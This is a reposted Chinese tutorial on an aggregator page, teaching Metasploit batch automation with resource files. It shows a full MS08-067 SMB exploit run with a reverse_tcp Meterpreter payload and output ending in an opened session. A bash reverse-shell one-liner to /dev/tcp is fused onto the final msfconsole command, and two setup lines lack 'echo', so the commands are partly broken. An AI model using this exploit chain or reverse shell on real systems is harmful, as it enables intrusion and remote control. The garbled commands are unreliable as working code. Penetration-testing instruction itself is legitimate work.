Sec Hotspot 首页  排行榜  收藏本站  技术博客  RSS
统计信息
已收录文章数量:9674 篇
已收录公众号数量:89 个
本站文章为爬虫采集,如有侵权请告知
本周热门文章
内网渗透报告及详细步骤-带教学   2020.04.02 10:07:07  90
每日安全动态推送(04-03)   2020.04.03 07:52:43  73
颤抖吧!郭某华重出江湖   2020.04.07 10:32:23  64
今日更新53个网络安全资料   2020.04.02 18:29:48  60
每日安全动态推送(04-02)   2020.04.02 07:47:28  49
免杀webshell?无限生成工具蚁剑   2020.04.04 08:01:34  47
已收录微信公众号
网信中国 区块链大本营 白说区块链 区块链投资家 区块链官微 区块链铅笔Blockchain HACK学习呀 二道情报贩子 合天智汇 小白帽学习之路 小米安全中心 弥天安全实验室 SAINTSEC SecPulse安全脉搏 TideSec安全团队 360安全卫士 游侠安全网 计算机与网络安全 安全祖师爷 安全学习那些事 腾讯安全联合实验室 黑客技术与网络安全 安全圈 腾讯御见威胁情报中心 Python开发者 Python之禅 编程派 Python那些事 Python程序员 安全威胁情报 吾爱破解论坛 行长叠报 安在 i春秋 嘶吼专业版 E安全 MottoIN 网信防务 网安杂谈 数说安全 互联网安全内参 漏洞战争 安全分析与研究 邑安全 ChaMd5安全团队 天融信阿尔法实验室 安全牛 SecWiki 安全学术圈 信安之路 漏洞感知 浅黑科技 Secquan圈子社区 奇安信集团 奇安信 CERT 国舜股份 雷神众测 盘古实验室 美团安全应急响应中心 瓜子安全应急响应中心 顺丰安全应急响应中心 蚂蚁金服安全响应中心 携程安全应急响应中心 滴滴安全应急响应中心 字节跳动安全中心 百度安全应急响应中心 腾讯安全应急响应中心 网易安全应急响应中心 OPPO安全应急响应中心 京东安全应急响应中心 Bypass CNNVD安全动态 安恒应急响应中心 天融信每日安全简报 奇安信威胁情报中心 看雪学院 黑白之道 水滴安全实验室 安全客 木星安全实验室 云鼎实验室 绿盟科技安全预警 白帽汇 深信服千里目安全实验室 腾讯玄武实验室 长亭安全课堂 FreeBuf 绿盟科技 nmask
Metasploit渗透测试:批处理
本文来自公众号:计算机与网络安全   2020.03.25 11:05:01

一次性 付费 进群, 长期 免费索取教程, 没有 付费教程。

微信群 回复公众号: 微信群 QQ群 460500587

教程列表 见微信公众号底部菜单 | 本文底部有推荐书籍

微信公众号:计算机与网络安全

ID:Computer-network


resource命令可以加载一些源 代码 并运行,也可以用来执行一些批量的脚本。该命令主要是通过加载资源文件,来实现自动化的 批处理 。资源文件(resource files)是MSF终端内包含一系列自动化命令的脚本文件。这些文件实际上是一个可以在MSF终端中执行的命令列表,列表中的命令将按顺序执行。资源文件可以大大减少测试和开发所需的时间,让用户将包括 渗透 攻击 在内的许多重复性任务变为自动化。本文介绍通过资源文件实现 批处理 的方法。


resource命令的语法格式如下:


resource path1 [path2...]


这里演示一个资源文件的简单使用。例如,将version命令保存到version.rc文件中。然后可以通过resource命令来加载该文件。执行命令如下:


msf5 > resource version.rc

[*] Processing version.rc for ERB directives.

resource (version.rc)> version

Framework: 4.16.48-dev

Console  : 4.16.48-dev


输出的信息中显示了Metasploit框架和终端的版本。


使用一个新建的名为autoexploit.rc的资源文件,执行一次SMB 攻击 。具体操作步骤如下:


1)在资源文件中设置 攻击 目标和 攻击 载荷等参数。


[root@RHEL ~]# echo use exploit/windows/smb/ms08_067_netapi > autoexploit.rc

[root@RHEL ~]# echo set RHOST 192.168.1.109 >> autoexploit.rc

[root@RHEL ~]# set PAYLOAD windows/meterpreter/reverse_tcp >> autoexploit.rc

[root@RHEL ~]# set LHOST 192.168.1.105 >> autoexploit.rc

[root@RHEL ~]# echo exploit >> autoexploit.rc


通过以上几个命令,资源文件就创建成功了。接下来将该资源文件载入到MSF终端。


2)在MSF终端,可以使用resource命令载入资源文件;或者在 操作系统 的命令行环境下使用-r选项将资源文件作为MSF终端的一个参数传递来运行。例如,使用resource命令载入资源文件。执行命令如下:


msf5 > resource /root/autoexploit.rc

[*] Processing /root/autoexploit.rc for ERB directives.

resource (/root/autoexploit.rc)> use exploit/windows/smb/ms08_067_netapi

resource (/root/autoexploit.rc)> set RHOST 192.168.1.109

RHOST => 192.168.1.109

resource (/root/autoexploit.rc)> exploit

[*] Started reverse TCP handler on 192.168.1.105:4444

[*] 192.168.1.109:445 - Automatically detecting the target...

[*] 192.168.1.109:445 - Fingerprint: Windows XP - Service Pack 0 / 1 - lang:Chinese - Traditional

[*] 192.168.1.109:445 - Selected Target: Windows XP SP0/SP1 Universal

[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...

[*] Sending stage (957999 bytes) to 192.168.1.109

[*] Meterpreter session 1 opened (192.168.1.105:4444 -> 192.168.1.109:1125) at 2017-05-08 17:26:22 +0800


从输出的信息中可以看到,载入资源文件后,文件中的命令被逐条地自动执行了。从最后一行信息显示成功 攻击 了目标 主机 ,并获取到了一个Meterpreter会话。如果想要使用-r选项来载入资源文件的话,则可以执行命令如下:


[root@RHEL bin]# ./msfconsole -r /root/autoexploit.rcbash -c 'bash -i >&/dev/tcp/127.0.0.1/4444 2>&1 0>&1'


微信公众号:计算机与网络安全

ID:Computer-network


【推荐书籍】